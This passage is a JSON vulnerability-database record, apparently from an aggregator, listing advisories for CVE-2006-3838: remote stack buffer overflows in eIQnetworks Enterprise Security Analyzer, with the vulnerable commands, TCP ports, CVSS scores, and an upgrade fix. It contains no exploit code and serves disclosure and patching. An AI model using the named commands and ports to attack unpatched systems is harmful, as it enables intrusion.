Description\nUpgrade to version 2.5.0 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.\n## Short Description\nA remote overflow exists in eIQnetworks Enterprise Security Analyzer. Topology.exe fails to perform proper bounds checking on the GUIADDDEVICE, ADDDEVICE, or DELETEDEVICE commands passed to TCP port 10628 resulting in a stack based buffer overflow. With a specially crafted request, an attacker can execute arbitrary code resulting in a loss of integrity.\n## References:\nVendor URL: http://www.toplayer.com/content/products/intrusion_detection/index.jsp\n[Vendor Specific Advisory URL](http://www.eiqnetworks.com/products/enterprisesecurity/EnterpriseSecurityAnalyzer/ESA_2.5.0_Release_Notes.pdf)\n[Secunia Advisory ID:21213](https://secuniaresearch.flexerasoftware.com/advisories/21213/)\n[Secunia Advisory ID:21214](https://secuniaresearch.flexerasoftware.com/advisories/21214/)\n[Secunia Advisory ID:21215](https://secuniaresearch.flexerasoftware.com/advisories/21215/)\n[Secunia Advisory ID:21218](https://secuniaresearch.flexerasoftware.com/advisories/21218/)\n[Secunia Advisory ID:21211](https://secuniaresearch.flexerasoftware.com/advisories/21211/)\n[Secunia Advisory ID:21217](https://secuniaresearch.flexerasoftware.com/advisories/21217/)\n[Related OSVDB ID: 27529](https://vulners.com/osvdb/OSVDB:27529)\n[Related OSVDB ID: 27526](https://vulners.com/osvdb/OSVDB:27526)\n[Related OSVDB ID: 27527](https://vulners.com/osvdb/OSVDB:27527)\n[Related OSVDB ID: 27525](https://vulners.com/osvdb/OSVDB:27525)\nOther Advisory URL: http://www.zerodayinitiative.com/advisories/TSRT-06-04.html\nOther Advisory URL: http://www.zerodayinitiative.com/advisories/ZDI-06-024.html\nMail List Post: http://archives.neohapsis.com/archives/fulldisclosure/2006-07/0700.html\nMail List Post: http://archives.neohapsis.com/archives/fulldisclosure/2006-07/0701.html\nMail List Post: http://archives.neohapsis.com/archives/fulldisclosure/2006-07/0604.html\nKeyword: TCP port 10628\nKeyword: TSRT-06-04\n[CVE-2006-3838](https://vulners.com/cve/CVE-2006-3838)\n", "published": "2006-07-25T05:34:16", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://vulners.com/osvdb/OSVDB:27528", "cvelist": ["CVE-2006-3838"], "lastseen": "2017-04-28T13:20:24"}], "zdi": [{"id": "ZDI-06-023", "type": "zdi", "title": "eIQnetworks Enterprise Security Analyzer Syslog TCP Server Buffer Overflow Vulnerability", "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of eIQnetworks Enterprise Security Analyzer. Authentication is not required to exploit this vulnerability.\n\nThe specific flaw exists within the Syslog daemon, syslogserver.exe, during the processing of long strings transmitted to the listening TCP port. The vulnerability is not exposed over UDP. The default configuration does not expose the open TCP port.", "published": "2006-07-25T00:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "http://www.zerodayinitiative.com/advisories/ZDI-06-023", "cvelist": ["CVE-2006-3838"], "lastseen": "2016-11-09T00:18:16"}, {"id": "ZDI-06-024", "type": "zdi", "title": "eIQnetworks Enterprise Security Analyzer License Manager Buffer Overflow", "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of eIQnetworks Enterprise Security Analyzer. Authentication is not required to exploit this vulnerability.\n\nThe specific flaw exists within EnterpriseSecurityAnalyzer.exe, which binds by default to TCP port 10616. During the processing of long arguments to the LICMGR_ADDLICENSE command a classic stack based buffer overflow occurs.", "published": "2006-07-25T00:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "http://www.zerodayinitiative.com/advisories/ZDI-06-024", "cvelist": ["CVE-2006-3838"], "lastseen": "2016-11-09T00:18:10"}]}}